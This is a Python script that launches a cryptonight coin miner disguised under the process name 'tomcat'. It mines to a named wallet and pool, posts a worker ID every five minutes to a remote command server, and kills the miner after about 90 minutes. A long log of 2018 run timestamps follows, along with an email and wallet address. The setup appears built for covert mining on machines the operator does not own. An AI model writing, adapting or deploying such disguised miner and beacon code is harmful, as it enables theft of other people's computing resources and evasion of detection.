import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:49:04.031482
#2018-02-17 17:37:02.159527
#2018-02-17 19:25:07.753357
#2018-02-17 21:15:04.124143
#2018-02-17 22:58:06.811996
#2018-02-18 00:44:02.078134
#2018-02-18 02:32:06.641966
#2018-02-18 04:19:06.219441
#2018-02-18 06:10:02.001778
#2018-02-18 08:01:07.443371
#2018-02-18 09:49:03.556243
#2018-02-18 11:36:08.354330
#2018-02-18 13:21:01.646034
#2018-02-18 15:11:01.633201
#2018-02-18 16:59:04.746482
#2018-02-18 18:47:03.511902
#2018-02-18 20:34:07.082235
#2018-02-18 22:20:03.213727
#2018-02-19 00:09:05.408414
#2018-02-19 01:55:06.513243
#2018-02-19 03:42:05.442404
#2018-02-19 05:27:02.075215
#2018-02-19 07:14:07.744512
#2018-02-19 09:02:04.510104
#2018-02-19 10:49:06.702438
#2018-02-19 12:38:07.110253
#2018-02-19 14:26:04.517732
#2018-02-19 16:14:09.122552
#2018-02-19 18:02:02.144706
#2018-02-19 19:49:01.671992
#2018-02-19 21:38:05.459703
#2018-02-19 23:24:06.987474
#2018-02-20 01:10:09.588469
#2018-02-20 03:01:03.740668
#2018-02-20 04:48:01.372408
#2018-02-20 06:32:05.550025
#2018-02-20 08:17:02.056271
#2018-02-20 10:02:08.036805
#2018-02-20 11:46:07.324729
#2018-02-20 13:33:06.971037
#2018-02-20 15:18:10.900290
#2018-02-20 17:05:09.032202
#2018-02-20 18:54:11.582680
#2018-02-20 20:44:06.737106
#2018-02-20 22:29:08.285777
#2018-02-21 00:09:01.940187
#2018-02-21 01:54:08.333431
#2018-02-21 03:44:05.198960
#2018-02-21 05:30:07.631239
#2018-02-21 07:18:06.874076
#2018-02-21 09:03:05.533821
#2018-02-21 10:51:01.209116
#2018-02-21 12:37:01.871423
#2018-02-21 14:23:05.721209
#2018-02-21 16:10:11.915007
#2018-02-21 18:02:01.337824
#2018-02-21 19:48:06.330432
#2018-02-21 21:34:05.642224
#2018-02-21 23:19:01.334941
#2018-02-22 01:08:06.843969
#2018-02-22 02:55:09.563780
#2018-02-22 04:42:01.999277
#2018-02-22 06:27:01.352240
#2018-02-22 08:14:02.056072
#2018-02-22 10:02:04.621752
#2018-02-22 11:47:09.727292
#2018-02-22 13:32:07.177074
#2018-02-22 15:20:10.566001
#2018-02-22 17:05:10.592228
#2018-02-22 18:53:04.294729
#2018-02-22 20:44:05.509072
#2018-02-22 22:30:10.766219
#2018-02-23 00:16:03.589201
#2018-02-23 02:04:04.429198
#2018-02-23 03:53:04.942211
#2018-02-23 05:35:05.252929
#2018-02-23 07:19:04.511146
#2018-02-23 09:23:06.969275
#2018-02-23 11:30:01.459590
#2018-02-23 13:20:10.855793
#2018-02-23 15:06:08.692445
#2018-02-23 16:54:06.942488
#2018-02-23 18:43:01.499117
#2018-02-23 20:28:07.299713
#2018-02-23 22:17:01.937681
#2018-02-24 00:03:09.204015
#2018-02-24 01:53:01.314919
#2018-02-24 03:44:01.328657
#2018-02-24 05:32:07.517237
#2018-02-24 07:18:04.436141
#2018-02-24 09:08:02.083858
#2018-02-24 10:44:07.298837
#2018-02-24 12:28:07.603676
#2018-02-24 14:01:06.864389
#2018-02-24 15:37:07.084639
#2018-02-24 17:20:04.114369
#2018-02-24 18:49:04.212163
#2018-02-24 20:22:01.321559
#2018-02-24 21:50:07.896784
#2018-02-25 00:32:01.384280
#2018-02-25 02:37:03.973897
#2018-02-25 06:18:06.881906
#2018-02-25 11:40:04.516409